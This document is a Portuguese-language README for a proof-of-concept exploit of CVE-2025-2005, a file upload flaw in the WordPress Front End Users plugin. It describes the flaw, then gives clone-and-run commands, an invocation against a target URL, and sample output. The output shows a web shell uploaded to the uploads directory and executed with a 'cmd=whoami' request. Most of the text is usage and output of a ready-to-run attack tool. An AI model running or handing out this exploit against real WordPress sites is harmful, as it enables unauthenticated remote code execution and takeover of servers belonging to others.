
WordPress FEUP Exploit de Upload Arbitrário de Arquivos (CVE-2025-2005)
Este repositório fornece um exploit de Prova de Conceito (PoC) para o plugin WordPress Front End Users (versões até 3.2.32), que é vulnerável a upload arbitrário de arquivos devido à falta de validação de MIME/tipo de arquivo no seu formulário de registro. Isso permite que atacantes não autenticados enviem arquivos maliciosos (ex.: web shells), potencialmente levando à Execução Remota de Código (RCE) no servidor.
/register/
/signup/
pip install requests beautifulsoup4
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
python3 exploit.py --url http://target.com --user hacker --password pass123
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami